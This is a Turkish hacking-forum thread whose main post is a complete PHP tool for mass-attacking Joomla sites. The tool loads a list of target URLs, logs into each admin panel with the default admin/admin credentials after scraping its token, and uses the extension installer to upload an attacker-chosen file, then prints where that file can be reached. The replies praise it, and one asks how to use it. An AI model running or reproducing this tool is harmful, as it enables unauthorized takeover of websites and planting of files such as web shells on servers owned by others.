Joomla Admin Panel Kirici + Otomatik Upload Priv8 (1 Viewer)

[Isko~]

<?php
//Joomla Admin Panel Kirici + Otomatik Upload Priv8 (com_install)
//Coded by MiyaChung
//[email protected]
//Mavi1.Org
//Joomlada Son Scriptim artik :D
ob_start();
set_time_limit(0);

echo '<center><title>Joomla Admin Panel Kirici - Otomatik Upload Priv8 - Mavi1.Org [MiyaChung]</title><form method="post" action="" enctype="multipart/form-data">
<b>Joomla Admin Panel Kirici - Oto Upload Coded by MiyaChung<b><br><br>Siteler : <br><input type="file" name="siteler"><br>
Dosya : <br><input type="text" name="dosya"><br>
<input type="submit" name="start" value="Scan"><br>www.mavi1.org
</form>
</center>';

class mavi{

public $yol = '#value="/(.*?)"#s';
public $regex = "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si";

public function admin($site){

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}
public function post($site){

$hash=self::hashBul($site."/administrator/index.php");

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username=admin&passwd=admin&lang=en-GB&option=com_login&task=login&'.$hash.'=1');
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}
public function upload($site,$dosya){

$hash=self::hashBul($site."/administrator/index.php");
$yol=self::yoluAl($site."/administrator/index.php?option=com_installer");

$dir=$_SERVER["DOCUMENT_ROOT"]."/".$dosya;

$post = array("install_package"=>"@".$dir."","install_directory"=>"".$yol."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php?option=com_installer");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$post);
curl_setopt($curl,CURLOPT_TIMEOUT,20);


$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function hashBul($site){
$adres=self::admin($site);
preg_match_all($this->regex,$adres,$token);

return $token[1][0];

}
public function yoluAl($site){

$curl=curl_init($site."/administrator/index.php?option=com_installer");
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);

preg_match_all($this->yol,$exec,$path);

foreach($path[0] as $pathx){
$pathx=ereg_replace('value="','',$pathx);
$pathx=ereg_replace('"','',$pathx);

return $pathx;

}

}

}
if(isset($_POST['start'])){

$mavi=new mavi();

$dosya=$_POST['dosya'];

$siteler=explode("\n",file_get_contents($_FILES["siteler"]["tmp_name"]));

foreach($siteler as $sites){
$sites=trim($sites);

if(eregi('com_config',$mavi->post($sites))){

$mavi->upload($sites,$dosya);
if(preg_match('#<li>Unknown Archive Type</li>#s',$mavi->upload($sites,$dosya))){

$url = $sites."/tmp/".$dosya;
echo '<a href="'.$url.'">'.$url.'</a><br>';
ob_flush();
flush();

}

}

}

}
?>

 

[FIRTINA]

Güzel Hacı.

 

[El-Cewad]

adam çalışıyor yaw

 

[by_dadaş]

nasıl kullanıcaz bunu biraz anlatım olsaydı iyi olurdu

 

[H4D3S]

Zamanım Olursa Denerik

 

[Kare]

Zamanım Olursa Denerik

kardeş sen scoulfy ayyıldık mısın qWA:FSF

 

[Kare]

forumu aytliler bastı

 

[Kare]

bu arada kardeşim eski konu hortlatmak yasak uyarmak benim haddime değil fakat dikkatli ol

 

[H4D3S]

forumu aytliler bastı

Aytden Ayrıldım Ben

 

[veyiez]

Eline Sağlık